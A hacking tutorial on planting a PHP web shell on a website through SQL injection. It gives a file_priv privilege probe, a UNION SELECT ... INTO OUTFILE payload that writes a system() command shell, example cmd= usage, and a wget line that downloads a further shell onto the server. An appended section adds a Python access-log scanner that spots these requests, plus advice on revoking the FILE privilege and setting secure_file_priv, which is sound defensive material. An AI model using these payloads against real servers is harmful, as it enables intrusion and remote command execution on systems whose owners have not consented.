[HOW TO] UPLOAD SHELL WITH SQL INJECTION QUERIES
Today we will cover how to upload a shell to a website with SQL queries. Yes, you can write a shell onto the web server with SQL statements without logging into the admin panel or any other control panel.
Note: I will not be covering the basics of SQL injection.
But for this you have to meet certain requirements.
- You must have write privileges and a writable directory (where the shell will be uploaded)
- Root path (i.e. /var/www/website/)
- Magic Quotes must be enabled
Now the question is how to check whether you have write permissions.
You can simply read file_priv from the mysql.user table:
localhost/page.php?id=1 union select 1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user--
If it says Y after your current user, then you are lucky and you have write privileges.
You know how to find out what the current user is, right? If not, don't worry, it's not that tough.
You can find it using the user() function.
Anyway, now how to get the full path? That is the tough part, because many websites don't show the full path in MySQL errors, so you might need to use some other tricks to get full path disclosure.
Okay, you have write privileges, the full path, and magic quotes are enabled. Now what?
Now it's time to make use of MySQL statements.
We are going to use INTO OUTFILE. Basically, INTO OUTFILE writes your selected rows to a file.
The basic syntax is:
select column_name from table_name into outfile "filepath/file.extension"
or whatever query result you want to save to a file; I just gave the basic syntax.
So how is it going to help us upload a shell?
We will write a small or long (whatever you want) piece of code to a file in a writable directory.
Example:
Let us upload a small PHP script. Suppose you have a full path like /var/www/website/public_html/
and we are going to upload the PHP script <?php system($_REQUEST['cmd'])?>
Our query will be like:
http://website.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"
Alright, what this will do is create a file named shell.php in the website directory and write that PHP code into it.
And now we can access our shell with
http://website.com/shell.php?cmd=whoami
You can run any command after cmd= .
Now you can download your shell onto it using curl or wget (I'm talking about Linux),
like cmd=wget http://website.com/shell.txt -O code.php
and then you can access your shell with
http://website.com/shell.php
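Seen from the server side, the requests in this post leave a recognisable trail in the web access log. The following is an added example, not part of the original post, that scans constructed log lines for the file_priv probe, the INTO OUTFILE write, and later requests to the file that was written; the log lines, the `scan` function and the finding labels are assumptions made for illustration.

```python
import re
from posixpath import basename
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (payload replaced by "x"); not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /page.php?id=1+union+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Mar/2024:10:02:09 +0000] "GET /file.php?id=1%20union%20select%201,%22x%22,3,4%20INTO%20OUTFILE%20%22/var/www/website/public_html/shell.php%22 HTTP/1.1" 200 0',
    '198.51.100.7 - - [10/Mar/2024:10:02:30 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 9',
    '203.0.113.5 - - [10/Mar/2024:10:03:00 +0000] "GET /page.php?id=7 HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PRIV_PROBE = re.compile(r'file_priv.*mysql\.user|mysql\.user.*file_priv', re.I | re.S)
OUTFILE = re.compile(r'into\s+outfile\s*["\']\s*([^"\']+)', re.I)

def scan(lines):
    """Return (line_no, client, finding) tuples for the request stages in the post."""
    findings, written = [], set()
    for no, line in enumerate(lines, 1):
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        query = unquote_plus(parts.query)  # decode %20 and + before matching
        if PRIV_PROBE.search(query):
            findings.append((no, client, "file_priv probe"))
        wrote = OUTFILE.search(query)
        if wrote:
            name = basename(wrote.group(1).strip())
            written.add(name)  # remember the file so later hits can be correlated
            findings.append((no, client, "INTO OUTFILE -> " + name))
        elif basename(parts.path) in written:
            findings.append((no, client, "request to written file " + basename(parts.path)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the database side, the write depends on the application account holding the FILE privilege and on MySQL's secure_file_priv setting allowing the target directory, so revoking FILE and restricting secure_file_priv blocks this step.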